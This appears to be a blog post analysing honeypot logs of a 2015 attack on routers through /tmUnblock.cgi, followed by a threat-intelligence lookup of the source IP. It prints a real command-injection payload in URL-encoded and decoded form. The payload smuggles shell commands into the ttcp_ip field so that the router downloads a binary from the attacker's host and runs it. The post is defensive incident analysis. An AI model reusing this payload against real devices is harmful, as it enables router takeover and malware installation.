BEGIN OF HTTP DATA:
2015-07-27 00:58:11
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
GET /tmUnblock.cgi HTTP/1.1
END OF DATA
BEGIN OF HTTP DATA:
2015-07-27 00:58:51
Source IP: 119.42.100.97
Country: TH RiskScore: 2.9 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 943
%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%31%39%2e%34%32%2e%31%30%30%2e%39%37%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
END OF DATA
What translates to
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://119.42.100.97:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1As you can see, the first test "GET /tmUnblock.cgi" was successful, so the attacker tried to inject the code to get this nttpd on to the system.
I was still not able to get my hands on this code. If someone has it, please let me know.
IBM-Xforce shows
{
"categoryDescriptions": {
"Dynamic IPs": "This category contains IP addresses of dialup hosts and DSL lines.",
"Spam": "This category lists IP addresses that were seen sending out spam."
},
"cats": {
"Dynamic IPs": 86,
"Spam": 29
},
"geo": {
"country": "Thailand",
"countrycode": "TH"
},
"ip": "119.42.100.97",
"reason": "Spam sending activity",
"reasonDescription": "This IP was involved in spam sending activities.",
"score": 2.9,
"subnets": [
{
"categoryDescriptions": {},
"cats": {},
"created": "2014-01-23T17:33:00.000Z",
"geo": {
"country": "Thailand",
"countrycode": "TH"
},
Keine Kommentare:
Kommentar veröffentlichen